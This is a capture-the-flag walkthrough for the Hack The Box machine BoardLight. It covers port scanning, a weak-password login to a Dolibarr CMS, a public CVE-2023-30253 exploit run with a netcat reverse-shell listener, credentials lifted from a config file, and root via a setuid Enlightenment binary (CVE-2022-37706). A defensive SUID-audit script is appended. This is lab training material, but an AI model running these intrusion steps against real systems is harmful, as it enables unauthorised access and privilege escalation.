BoardLight Target Notes
Overview
HTB target machine: BoardLight
Target machine address: /machines/BoardLight
I. Nmap scanning
1) Port scanning
-sT  TCP full-connect scan; --min-rate 10000  send probes at no less than 10000 per second; -p-  scan all 65535 ports; -oN ports  save normal output to the file "ports"
sudo nmap -sT --min-rate 10000 -p- -oN ports 10.10.11.11
Warning: 10.10.11.11 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.11
Host is up (0.23s latency).
Not shown: 41074 closed tcp ports (conn-refused), 24459 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Sat Aug 17 20:10:36 2024 -- 1 IP address (1 host up) scanned in 100.49 seconds
2) Service and OS detection
-sT  TCP full-connect scan; -sV  detect service versions; -sC  run the default NSE scripts; -O  detect the target operating system
sudo nmap -sT -sV -sC -O -p22,80 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.36s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 062d3b851059ff7366277f0eae03eaf4 (RSA)
| 256 5903dc52873a359934447433783135fb (ECDSA)
|_ 256 ab1338e43ee024b46938a9638238ddf4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Sat Aug 17 20:12:43 2024 -- 1 IP address (1 host up) scanned in 44.29 seconds
3) Vulnerability script scan
sudo nmap --script=vuln -oN vuln 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.46s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf: [0/105]
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.11.11
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.11.11:80/
| Form id:
| Form action:
|
| Path: http://10.10.11.11:80/
| Form id:
| Form action:
|
| Path: http://10.10.11.11:80/
| Form id:
| Form action:
|
| Path: http://10.10.11.11:80/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
# Nmap done at Sat Aug 17 20:16:04 2024 -- 1 IP address (1 host up) scanned in 156.22 seconds
II. Web penetration
1) Domain discovery
The footer of the site reveals a domain name; add it to /etc/hosts:
echo "10.10.11.11 " | sudo tee -a /etc/hosts
Run subdomain brute-forcing and directory brute-forcing against it.
Subdomain brute-forcing found another virtual host ( .htb), which is also added to /etc/hosts.
Visiting it shows a CMS login page; trying the weak credentials admin:admin succeeds.
Log in.
III. Gaining a foothold
A Google search turns up Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.
Following the usage instructions in the GitHub repository:
On the local Kali box, start a listener:
nc -lvvp 4444
Run the exploit script:
python3 admin admin 10.10.14.69 4444
The reverse shell connects back successfully.
Locate the CMS configuration file; it contains a set of credentials.
Check which users exist on the box:
ls /home
larissa
SSH credentials: larissa:serverfun2$2023!!
Connect over SSH to get a shell as the regular user:
ssh larissa@10.10.11.11
IV. Privilege escalation to root
Enumerate SUID binaries:
find / -perm -4000 -type f 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
enlightenment_sys stands out: it is a SUID binary affected by the privilege-escalation vulnerability
CVE-2022-37706
Download the exploit to Kali, serve it with a PHP web server on port 80, fetch it on the target with wget, and run it to get root.
Get the root flag.
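As an added example (not part of the original notes), the defender's counterpart to the SUID enumeration above: record the set of setuid binaries once and diff it on a schedule, so that a setuid helper such as enlightenment_sys showing up outside the baseline is flagged. The directory tree and file names below are constructed for the demo, not taken from a real system.

```shell
# collect_suid ROOT: list regular setuid files under ROOT, one per line, sorted
# (same test as the notes' `find / -perm -4000 -type f`, restricted to one filesystem).
collect_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort -u
}

# suid_diff BASELINE_FILE CURRENT_FILE: print "+ path" for new setuid files and
# "- path" for ones that disappeared. Both files must be sorted (collect_suid does that).
suid_diff() {
    comm -13 "$1" "$2" | sed 's/^/+ /'
    comm -23 "$1" "$2" | sed 's/^/- /'
}

# Demo on a constructed tree: two "standard" setuid files form the baseline, then a
# helper under /usr/lib gains the setuid bit, mirroring enlightenment_sys on the target.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/usr/bin" "$demo_root/usr/lib/helper"
for f in usr/bin/passwd usr/bin/sudo usr/lib/helper/some_helper; do
    : > "$demo_root/$f"
done
chmod u+s "$demo_root/usr/bin/passwd" "$demo_root/usr/bin/sudo"
# Strip the demo prefix so the saved paths look like real absolute paths.
collect_suid "$demo_root" | sed "s|^$demo_root||" > "$demo_root/baseline.txt"

chmod u+s "$demo_root/usr/lib/helper/some_helper"   # the change an audit should catch
collect_suid "$demo_root" | sed "s|^$demo_root||" > "$demo_root/current.txt"

suid_diff "$demo_root/baseline.txt" "$demo_root/current.txt"
# prints: + /usr/lib/helper/some_helper
```

On a real host, save the baseline right after installation and run suid_diff from cron; any "+" line is a new privileged binary that needs a reason to exist.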
Summary
- Nmap scanning shows that the target has ports 22 and 80 open.
- Directory brute-forcing and subdomain brute-forcing against the HTTP service on port 80 revealed the Dolibarr CMS, and a Google search found the exploit script Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.
- Exploiting the CMS vulnerability gave a shell; reading the configuration revealed the credentials larissa:serverfun2$2023!!, which gave a shell as that user.
- A root shell was obtained by exploiting the SUID binary of the Enlightenment desktop component.